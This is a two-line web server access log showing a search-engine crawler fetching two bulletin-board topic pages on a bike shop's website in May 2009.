81.19.66.38 - - [10/May/2009:15:26:37 -0700] "GET /bullitinboard/viewtopic.php?p=1972 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [10/May/2009:15:26:37 -0700] "GET /bullitinboard/viewtopic.php?p=1625 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
